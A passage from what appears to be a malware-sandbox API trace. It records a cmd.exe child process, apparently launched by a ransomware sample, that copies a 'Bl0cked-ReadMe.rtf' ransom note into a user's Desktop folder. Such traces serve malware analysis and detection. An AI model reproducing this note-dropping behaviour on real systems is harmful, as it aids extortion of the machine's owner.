lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.675] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.675] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x32, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x32, lpOverlapped=0x0) returned 1 [0225.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.675] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.676] _close (_FileHandle=4) returned 0 [0225.676] FindNextFileW (in: hFindFile=0x3d0e60, lpFindFileData=0x2eeeac | out: lpFindFileData=0x2eeeac) returned 0 [0225.677] GetLastError () returned 0x12 [0225.677] FindClose (in: hFindFile=0x3d0e60 | out: hFindFile=0x3d0e60) returned 1 [0225.677] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0225.677] _close (_FileHandle=3) returned 0 [0225.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.678] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.678] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.678] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.678] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.678] SetConsoleInputExeNameW () returned 0x1 [0225.678] GetConsoleOutputCP () returned 0x1b5 [0225.678] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.678] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.679] exit (_Code=0) Process: id = "588" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b80" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33569 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33570 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33571 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33572 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 33573 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33574 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33575 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33576 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33577 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 33578 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33683 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33684 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33685 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33686 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 33687 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 33688 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33689 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33690 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33691 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33692 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33693 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33694 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33695 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33696 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33697 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 33698 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33699 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33700 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33701 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 33702 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 33703 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 33704 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 33705 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 33706 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 811 os_tid = 0xe78 [0224.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe74 | out: lpSystemTimeAsFileTime=0x18fe74*(dwLowDateTime=0xb9902f80, dwHighDateTime=0x1d440a9)) [0224.679] GetCurrentProcessId () returned 0xd44 [0224.679] GetCurrentThreadId () returned 0xe78 [0224.679] GetTickCount () returned 0x3e159 [0224.679] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe6c | out: lpPerformanceCount=0x18fe6c*=28146814945) returned 1 [0224.679] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0224.679] __set_app_type (_Type=0x1) [0224.679] __p__fmode () returned 0x76b331f4 [0224.680] __p__commode () returned 0x76b331fc [0224.680] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0224.680] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0224.680] GetCurrentThreadId () returned 0xe78 [0224.680] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe78) returned 0x38 [0224.680] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0224.680] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0224.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.681] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0224.681] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe04 | out: phkResult=0x18fe04*=0x0) returned 0x2 [0224.681] VirtualQuery (in: lpAddress=0x18fe3b, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.681] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0224.681] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0224.681] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.681] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fdd4, dwLength=0x1c | out: lpBuffer=0x18fdd4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0224.681] GetConsoleOutputCP () returned 0x1b5 [0224.681] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.682] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0224.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.682] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0224.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.682] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0224.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.682] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.682] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.683] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0224.683] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.683] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0224.683] GetEnvironmentStringsW () returned 0x240198* [0224.683] FreeEnvironmentStringsW (penv=0x240198) returned 1 [0224.683] GetEnvironmentStringsW () returned 0x240198* [0224.683] FreeEnvironmentStringsW (penv=0x240198) returned 1 [0224.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ed74 | out: phkResult=0x18ed74*=0x40) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0xc0, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x1, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x1, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x0, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x40, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x40, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x40, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegCloseKey (hKey=0x40) returned 0x0 [0224.684] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ed74 | out: phkResult=0x18ed74*=0x40) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x40, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x1, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x1, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x0, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x9, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x4, lpData=0x18ed80*=0x9, lpcbData=0x18ed78*=0x4) returned 0x0 [0224.684] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed7c, lpData=0x18ed80, lpcbData=0x18ed78*=0x1000 | out: lpType=0x18ed7c*=0x0, lpData=0x18ed80*=0x9, lpcbData=0x18ed78*=0x1000) returned 0x2 [0224.684] RegCloseKey (hKey=0x40) returned 0x0 [0224.684] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b8 [0224.684] srand (_Seed=0x5b8863b8) [0224.684] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" [0224.684] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" [0224.684] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.685] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2418f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0224.685] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0224.685] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0224.685] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.685] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0224.685] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0224.685] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0224.685] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0224.685] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0224.685] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0224.685] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0224.685] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0224.685] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0224.685] GetEnvironmentStringsW () returned 0x2422e8* [0224.685] FreeEnvironmentStringsW (penv=0x2422e8) returned 1 [0224.685] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.685] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.685] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0224.685] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0224.685] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0224.685] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0224.685] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0224.685] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0224.685] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0224.686] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0224.686] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fb40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.686] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fb40, lpFilePart=0x18fb3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fb3c*="Desktop") returned 0x18 [0224.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0224.686] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f8bc | out: lpFindFileData=0x18f8bc) returned 0x240028 [0224.686] FindClose (in: hFindFile=0x240028 | out: hFindFile=0x240028) returned 1 [0224.686] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f8bc | out: lpFindFileData=0x18f8bc) returned 0x240028 [0224.686] FindClose (in: hFindFile=0x240028 | out: hFindFile=0x240028) returned 1 [0224.686] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f8bc | out: lpFindFileData=0x18f8bc) returned 0x240028 [0224.686] FindClose (in: hFindFile=0x240028 | out: hFindFile=0x240028) returned 1 [0224.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0224.686] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0224.686] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0224.687] GetEnvironmentStringsW () returned 0x242b08* [0224.687] FreeEnvironmentStringsW (penv=0x242b08) returned 1 [0224.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.687] GetConsoleOutputCP () returned 0x1b5 [0224.689] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.689] GetUserDefaultLCID () returned 0x409 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fc80, cchData=128 | out: lpLCData="0") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fc80, cchData=128 | out: lpLCData="0") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fc80, cchData=128 | out: lpLCData="1") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0224.690] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0224.691] GetConsoleTitleW (in: lpConsoleTitle=0x2308f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0224.691] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0224.691] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0224.691] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0224.692] _wcsicmp (_String1="type", _String2=")") returned 75 [0224.692] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0224.692] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0224.692] _wcsicmp (_String1="IF", _String2="type") returned -11 [0224.692] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0224.692] _wcsicmp (_String1="REM", _String2="type") returned -2 [0224.692] _wcsicmp (_String1="REM/?", _String2="type") returned -2 